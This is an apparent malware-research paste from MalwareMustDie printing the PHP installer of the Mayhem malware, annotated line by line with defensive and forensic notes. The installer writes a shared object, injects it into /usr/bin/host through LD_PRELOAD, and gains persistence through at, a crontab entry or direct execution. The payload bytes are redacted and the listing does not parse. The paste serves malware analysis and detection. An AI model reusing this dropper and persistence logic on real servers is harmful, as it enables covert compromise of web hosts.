
#Mayhem Installer | latest one

MalwareMustDie Jul 27th, 2014 336 Never
  1. #MalwareMustDie | ScrapNote
  2. #Mayhem script installer.
  3. #Case:
  4. https://twitter.com/MalwareMustDie/status/492572445744721921 …
  5. https://twitter.com/MalwareMustDie/status/492556259996876800 …
  6. https://twitter.com/MalwareMustDie/status/492578929232707584 …
  7.  
  8. # codes:
  9.  
  10. <?php
  11.  
  12. header("Content-type: text/plain");
      /* The response is declared as plain text, so the progress strings printed
       * below ("Arch is ...", "System is ...", "SO dumped ...", "AT success",
       * "CRONTAB success", "Running straight") go back verbatim to whoever
       * requested this page. Those strings in a web response body are a usable
       * detection signature for this installer. */
  13.  
  14. if (! function_exists('file_put_contents')) {
      /* Compatibility shim: defined only when the PHP build has no built-in
       * file_put_contents(), so the two file writes later in this script
       * (the shared object and 1.sh) work on either kind of build. */
  15.         function file_put_contents($filename, $data) {
                      /* Opens $filename for writing (truncating); @ hides the
                       * warning and a failed open is reported as false. */
  16.                 $f = @fopen($filename, 'w');
  17.                 if (! $f)
  18.                         return false;
                      /* Returns whatever fwrite() returned: the byte count, or
                       * false on a write error. */
  19.                 $bytes = fwrite($f, $data);
  20.                 fclose($f);
  21.                 return $bytes;
  22.         }
  23. }
  24.  
  25. @system("killall -9 ".basename("/usr/bin/host"));
      /* Stage one: pick a payload, adapt it to the local OS and write it to disk.
       * The line above runs `killall -9 host` (basename of /usr/bin/host), i.e.
       * it SIGKILLs every process named "host" before a new one is started;
       * @ suppresses PHP's error output. */
  26.  
      /* NOTE(review): both payload strings are the placeholder "xxxxxxxxxxxxxx"
       * and the two assignments lack a terminating semicolon, so the listing
       * as pasted does not parse. Presumably the poster redacted the embedded
       * 32-bit and 64-bit shared-object bytes -- confirm against the sample. */
  27. $so32="xxxxxxxxxxxxxx"
  28. $so64="xxxxxxxxxxxxxx"
  29.  
      /* Word-size probe: on a 32-bit PHP build intval() of this string
       * saturates at 2147483647, so the comparison is true only there. It
       * measures PHP's integer width, which is used as a stand-in for the
       * machine architecture. */
  30. $arch = 64;
  31. if (intval("9223372036854775807") == 2147483647)
  32.         $arch = 32;
  33. print "Arch is ".$arch."\n";
  34. $so = $arch == 32 ? $so32 : $so64;
      /* Reads the first 8 bytes of the local /usr/bin/host binary. unpack("C*")
       * returns a 1-indexed array, so $n[8] is the byte at file offset 7; in an
       * ELF header that is the EI_OSABI field, and the script treats the value 9
       * as FreeBSD and anything else as Linux. The same byte is copied into
       * offset 7 of the payload so its OS/ABI marker matches the host binary.
       * If the file cannot be opened the payload is written unmodified. */
  35. $f = fopen("/usr/bin/host", "rb");
  36. if ($f) {
  37.         $n = unpack("C*", fread($f, 8));
  38.         $so[7] = sprintf("%c", $n[8]);
  39.         print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."\n";
  40.         fclose($f);
  41. }
      /* Writes the payload as ./atom-aggregator.so in the script's current
       * working directory and prints the byte count (or an empty string when
       * the write returned false). Nothing visible in this listing deletes the
       * file again, so a file of that name in a web-writable directory is a
       * durable on-disk indicator. */
  42. print "SO dumped ".file_put_contents("./atom-aggregator.so", $so)."\n";
      /* With MAYHEM_DEBUG set in the environment the script stops here: the
       * shared object is on disk but no launcher is written or scheduled. */
  43. if (getenv("MAYHEM_DEBUG"))
  44.         exit(0);
  45. $AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
      /* $AU is the server name plus request URI under which this installer was
       * fetched. It is exported as the environment variable AU for the launched
       * process; what the shared object does with it is not visible here. */
  46. /* second stage dropper */
  47. $HBN=basename("/usr/bin/host");
  48. $SCP=getcwd();
      /* Builds the text of a /bin/sh launcher. When run, that script:
       *   - changes into the directory this PHP script ran from ($SCP);
       *   - only if ./atom-aggregator.so exists: kills processes named "host",
       *     exports AU and LD_PRELOAD=./atom-aggregator.so, runs /usr/bin/host
       *     (so the dynamic loader pulls the dropped library into that
       *     process), unsets LD_PRELOAD, then rewrites the user's crontab
       *     without lines matching 1.sh or containing "crontab";
       *   - in every case deletes 1.sh and exits 0.
       * Forensic consequences: the launcher removes itself, and the crontab
       * clean-up sits inside the if-branch, so when the .so is missing a cron
       * entry pointing at the deleted 1.sh can be left behind. A "host" process
       * whose environment carries LD_PRELOAD and AU is the runtime indicator. */
  49. $SCR  ="#!/bin/sh\ncd '".$SCP."'\nif [ -f './atom-aggregator.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./atom-aggregator.so\n/usr/bin/host\nunset LD_PRELOAD\n";
  50. $SCR .="crontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n";
      /* Writes the launcher as 1.sh in the current directory and sets mode 0777
       * (readable, writable and executable by every user); errors from both
       * calls are suppressed with @. */
  51. @file_put_contents("1.sh", $SCR);
  52. @chmod("1.sh", 0777);
  53. /* try at now, file will be removed, crontab cleaned on success */
      /* Launch attempt 1 of 3: hand 1.sh to at(1) for immediate execution.
       * $ret receives the exit status. Because 1.sh deletes itself, the loop
       * polls once per second, five times, and treats the file's disappearance
       * as proof that the job ran. Defenders: at jobs submitted by the
       * web-server account are the artifact of this path. */
  54. @system("at now -f 1.sh", $ret);
  55. if ($ret == 0) {
  56.         for ($i = 0; $i < 5; $i++) {
  57.                 if (! @file_exists("1.sh")) {
  58.                         print "AT success\n";
  59.                         exit(0);
  60.                 }
  61.                 sleep(1);
  62.         }
  63. }
      /* Launch attempt 2 of 3: rewrite the current user's crontab as its
       * existing entries (minus any line containing "crontab") plus a new
       * every-minute entry that runs 1.sh from $SCP. The loop then waits up to
       * 62 seconds, long enough for one cron tick, for 1.sh to delete itself.
       * On success 1.sh strips its own entry again, so a clean crontab
       * afterwards does not show that this path was unused; cron execution
       * logs for the web-server account are the better record. */
  64. @system("(crontab -l|grep -v crontab;echo;echo '* * * * * ".$SCP."/1.sh')|crontab", $ret);
  65. if ($ret == 0) {
  66.         for ($i = 0; $i < 62; $i++) {
  67.                 if (! @file_exists("1.sh")) {
  68.                         print "CRONTAB success\n";
  69.                         exit(0);
  70.                 }
  71.                 sleep(1);
  72.         }
  73. }
      /* Launch attempt 3 of 3 (fallback): execute 1.sh directly, so the shell
       * and the resulting host process are started from the PHP/web-server
       * process itself. */
  74. print "Running straight\n";
  75. @system("./1.sh");
  76.  
  77. ?>
  78.  
  79. -----
  80. #MalwareMustDie | Collected by @unixfreaxjp